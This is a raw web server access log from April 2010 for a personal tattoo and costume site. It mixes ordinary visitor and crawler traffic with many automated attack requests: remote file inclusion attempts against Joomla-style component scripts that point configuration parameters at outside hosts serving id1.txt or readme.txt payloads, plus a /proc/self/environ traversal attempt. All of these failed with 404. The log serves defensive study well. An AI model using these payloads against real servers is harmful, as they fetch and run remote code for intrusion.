114.78.23.84 - - [25/Apr/2010:21:19:55 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:19:55 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:19:55 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:19:55 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:19:55 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:19:55 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:19:55 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:19:56 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:19:56 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:01 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:02 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:02 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:02 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:02 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:02 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:02 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:02 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:02 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:02 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:02 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:05 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:08 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:08 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:09 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.bing.com/search?q=Vintage+Tattoo+Flash&FORM=R5FD6""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
114.78.23.84 - - [25/Apr/2010:21:20:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1059 Safari/532.5"
75.126.28.140 - - [25/Apr/2010:21:25:54 -0500] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:21:25:54 -0500] "GET /logs/access_log.1219708800//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:21:25:57 -0500] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:21:26:07 -0500] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:21:26:07 -0500] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:21:26:07 -0500] "GET /logs/access_log.1219708800//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:21:27:53 -0500] "GET /logs/access_log.1219708800%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
75.126.28.140 - - [25/Apr/2010:21:28:08 -0500] "GET /logs/access_log.1219708800%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.pyungsan.or.kr/bbs/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:21:28:23 -0500] "GET /logs/access_log.1220054400%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:21:28:23 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:21:28:23 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:21:28:32 -0500] "GET /logs/access_log.1220054400%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:21:28:32 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:21:28:32 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.46.195.232 - - [25/Apr/2010:21:33:25 -0500] "GET /logs/access_log.1248912000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [25/Apr/2010:21:37:49 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:21:37:49 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:21:37:49 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:21:37:55 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.30.161.241 - - [25/Apr/2010:21:40:51 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.241 - - [25/Apr/2010:21:40:51 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.180 - - [25/Apr/2010:21:40:54 -0500] "GET /logs/access_log.1203465600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [25/Apr/2010:21:42:11 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:21:42:11 -0500] "GET /logs/access_log.1220054400%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:21:42:11 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:21:42:17 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.195.112.180 - - [25/Apr/2010:21:44:14 -0500] "GET /costume/thmb7.htm HTTP/1.0" 200 2938 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.67.201.187 - - [25/Apr/2010:21:52:58 -0500] "GET /logs//index.php?meio.php=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
61.67.201.187 - - [25/Apr/2010:21:52:58 -0500] "GET //index.php?meio.php=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.67.201.187 - - [25/Apr/2010:21:52:58 -0500] "GET /logs/access_log.1266192000//index.php?meio.php=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.67.201.187 - - [25/Apr/2010:21:52:58 -0500] "GET /logs/access_log.1262736000//index.php?meio.php=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.67.201.187 - - [25/Apr/2010:21:53:02 -0500] "GET //index.php?meio.php=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.67.201.187 - - [25/Apr/2010:21:53:02 -0500] "GET /logs//index.php?meio.php=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
61.67.201.187 - - [25/Apr/2010:21:53:02 -0500] "GET /logs/access_log.1262736000//index.php?meio.php=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.67.201.187 - - [25/Apr/2010:21:53:02 -0500] "GET /logs/access_log.1266192000//index.php?meio.php=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:21:53:08 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:21:53:08 -0500] "GET /logs/access_log.1217548800//s_loadenv.inc.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:21:53:08 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.67.201.187 - - [25/Apr/2010:21:53:15 -0500] "GET //index.php?meio.php=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
61.67.201.187 - - [25/Apr/2010:21:53:15 -0500] "GET /logs//index.php?meio.php=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
61.67.201.187 - - [25/Apr/2010:21:53:15 -0500] "GET /logs/access_log.1262736000//index.php?meio.php=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.67.201.187 - - [25/Apr/2010:21:53:15 -0500] "GET /logs/access_log.1266192000//index.php?meio.php=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:21:53:17 -0500] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:21:53:38 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:21:53:38 -0500] "GET /logs/access_log.1217548800//s_loadenv.inc.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:21:53:38 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:21:53:38 -0500] "GET /logs/access_log.1217462400//s_loadenv.inc.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
77.75.76.115 - - [25/Apr/2010:21:53:49 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (compatible; Seznam screenshot-generator 2.0; +http://fulltext.sblog.cz/screenshot/)"
77.75.76.115 - - [25/Apr/2010:21:54:38 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (compatible; Seznam screenshot-generator 2.0; +http://fulltext.sblog.cz/screenshot/)"
68.233.9.242 - - [25/Apr/2010:21:58:20 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.833"
68.233.9.242 - - [25/Apr/2010:21:58:22 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.833"
68.233.9.242 - - [25/Apr/2010:21:59:31 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.833"
68.233.9.242 - - [25/Apr/2010:21:59:40 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.833"
125.251.103.3 - - [25/Apr/2010:22:01:23 -0500] "GET //com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
78.110.50.120 - - [25/Apr/2010:22:02:28 -0500] "GET /logs/access_log.1270598400%20%20//option,com_sitemap/Itemid,104//?mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
78.110.50.120 - - [25/Apr/2010:22:02:28 -0500] "GET //option,com_sitemap/Itemid,104//?mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
78.110.50.120 - - [25/Apr/2010:22:02:28 -0500] "GET /logs//option,com_sitemap/Itemid,104//?mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.110.50.120 - - [25/Apr/2010:22:03:21 -0500] "GET /logs/access_log.1270598400//option,com_sitemap/Itemid,104//?mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
78.110.50.120 - - [25/Apr/2010:22:03:21 -0500] "GET //option,com_sitemap/Itemid,104//?mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
78.110.50.120 - - [25/Apr/2010:22:03:21 -0500] "GET /logs//option,com_sitemap/Itemid,104//?mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
125.251.103.3 - - [25/Apr/2010:22:04:32 -0500] "GET //com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
125.251.103.3 - - [25/Apr/2010:22:04:35 -0500] "GET //com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
222.236.47.182 - - [25/Apr/2010:22:05:28 -0500] "GET /logs/access_log.1217462400%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
222.236.47.182 - - [25/Apr/2010:22:05:28 -0500] "GET /logs/access_log.1217548800%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
125.251.103.3 - - [25/Apr/2010:22:05:48 -0500] "GET //com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
207.46.195.233 - - [25/Apr/2010:22:06:25 -0500] "GET /logs/access_log.1198540800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.120 - - [25/Apr/2010:22:08:47 -0500] "GET /logs/access_log.1271030400//option,com_sitemap/Itemid,104//?mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
78.110.50.120 - - [25/Apr/2010:22:09:16 -0500] "GET /logs/access_log.1271030400%20%20//option,com_sitemap/Itemid,104//?mosConfig_absolute_path=http://www.foodntop.com/bbs/icon/LC1?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
68.233.9.242 - - [25/Apr/2010:22:09:27 -0500] "GET /logs/access_log.1220054400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.833"
68.233.9.242 - - [25/Apr/2010:22:09:28 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.833"
68.233.9.242 - - [25/Apr/2010:22:09:28 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.833"
207.46.13.49 - - [25/Apr/2010:22:10:25 -0500] "GET /logs/access_log.1159574400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
68.233.9.242 - - [25/Apr/2010:22:10:50 -0500] "GET /logs/access_log.1219708800//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.833"
62.178.217.28 - - [25/Apr/2010:22:10:52 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""betaBot"
62.178.217.28 - - [25/Apr/2010:22:10:53 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""betaBot"
66.249.71.36 - - [25/Apr/2010:22:16:27 -0500] "GET /logs/access_log.1212019200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.220.193.170 - - [25/Apr/2010:22:17:34 -0500] "GET /logs/access_log.1220054400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 376 "-""Mozilla/5.0"
211.220.193.170 - - [25/Apr/2010:22:17:34 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 352 "-""Mozilla/5.0"
211.220.193.170 - - [25/Apr/2010:22:17:34 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt?????????????? HTTP/1.1" 404 347 "-""Mozilla/5.0"
68.233.9.242 - - [25/Apr/2010:22:20:06 -0500] "GET /logs/access_log.1220054400//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.833"
68.233.9.242 - - [25/Apr/2010:22:20:06 -0500] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.833"
68.233.9.242 - - [25/Apr/2010:22:20:06 -0500] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.833"
222.231.60.209 - - [25/Apr/2010:22:21:00 -0500] "GET /logs/access_log.1220054400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:22:21:00 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:22:21:00 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:22:21:14 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:22:21:14 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
222.231.60.209 - - [25/Apr/2010:22:21:14 -0500] "GET /logs/access_log.1220054400%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 376 "-""Mozilla/5.0"
68.233.9.242 - - [25/Apr/2010:22:21:22 -0500] "GET /logs/access_log.1219708800//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.833"
67.201.34.227 - - [25/Apr/2010:22:24:13 -0500] "GET /logs/access_log.1262822400/includes/phpdig/includes/config.php?relative_script_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.813"
67.201.34.227 - - [25/Apr/2010:22:24:13 -0500] "GET /includes/phpdig/includes/config.php?relative_script_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.813"
67.201.34.227 - - [25/Apr/2010:22:24:14 -0500] "GET /logs/includes/phpdig/includes/config.php?relative_script_path=http://www2.beppegrillo.it//iniziative/readme.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.813"
94.23.198.207 - - [25/Apr/2010:22:27:10 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
